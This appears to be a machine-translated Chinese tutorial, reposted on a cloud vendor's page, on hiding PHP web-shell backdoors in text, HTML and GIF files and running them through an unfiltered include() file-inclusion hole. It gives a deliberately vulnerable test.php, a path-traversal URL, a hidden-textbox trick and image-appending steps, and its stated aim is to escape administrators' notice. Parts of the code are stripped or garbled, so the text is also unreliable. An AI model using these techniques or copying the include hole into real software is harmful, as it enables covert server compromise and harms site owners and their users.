Security Basics: PHP Backdoor hidden Skills Test Report

Source: Internet
Author: User
Tags include php file

Recently a lot of friends are asking me if I can hide my one-word trojan in HTML or picture, in fact, a word trojan inserted into the PHP file has been very covert, if you just want to put into the HTML file or picture, then look down this article test report it. You know that if you put a PHP statement in a picture, you can't do it anyway, because PHP only resolves files that have the file name extension PHP. So be able to make the PHP statement hidden in the picture executed. We have recourse to the call function in PHP: Include, require, and so on.

We still remember the previous days to hide the Trojan to the picture of the article bar. That is, in the PHP file with include ("x.gif") such statements to invoke hidden in the picture of the Trojan. The statements in ASP are similar. Seemingly very covert but call pictures directly to people who know a little bit about PHP is not difficult to find suspicious. Because the URL in the get way difficult to pass parameters, which makes the performance of the Trojan can not be played.

Include functions are used more frequently in PHP, so there are also a lot of security issues, such as PHPWIND1.36 vulnerabilities because the variables behind include are not filtered. This allows us to construct similar statements to insert into the PHP file. Then hide the trojan in the picture or HTML file, you can say that the concealment is even higher. Insert the following sentence in the Phpwind forum: "? @include includ/$PHPWIND _root; > General admin is unable to see out.

With the include function to help us, we can hide the PHP trojan in many types of files, such as TXT, HTML, and picture files. Because TXT, HTML and picture files of these three types of files in the forum or article system is the most common, the following we will do the test in turn.

First set up a php file test.php file content is:

$test =$_get[' test '];

@include ' test/'. $test;

? >

TXT file is generally a description file, so we put a word Trojan into the directory of the description file OK. Casually create a TXT file t.txt. We pasted a word trojan into the T.txt file. Then visit http://localhost/test/test.php?test=. /t.txt If you see the contents of the T.txt OK, then add the Lanker mini PHP backdoor client Trojan address to the http://localhost/test/test.php?test=. /t.txt Password added to cmd on it, the results of the implementation of the return can be seen.

For HTML files, this is typically a template file. In order for the Trojan to be inserted into the HTML file to be invoked and not displayed, we can add a text box with a hidden attribute in HTML, such as: Then use the method above. The results of the return of the execution can generally be viewed from the source file. Use to view this program directory function. View source file contents As I can get the directory for C:\Uniserver2_7s\www\test.

Below we say the picture file, to say the most poisonous one trick is to hide the trojan in the picture. We can edit a picture directly and insert it at the end of the picture.

The test generally does not affect the picture. Then the same method client Trojan address added

We look at the PHP environment variable Returns the result is the original picture.

There may be a gap between the results we imagined, in fact, the command has been run, only the return results are not visible, because this is a real GIF file, so it will not show the return results, in order to prove whether the implementation of the command we execute the upload file command. As expected, the file was successfully uploaded to the server. The advantage of this forgery is good concealment. The disadvantage also naturally needless to say is not echo. If you want to see the results returned, take out a notepad and forge a fake picture file.

Here is the basic test finished, how to hide php back door to see your own choice. If there are any irregularities, please point out the wording.



Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.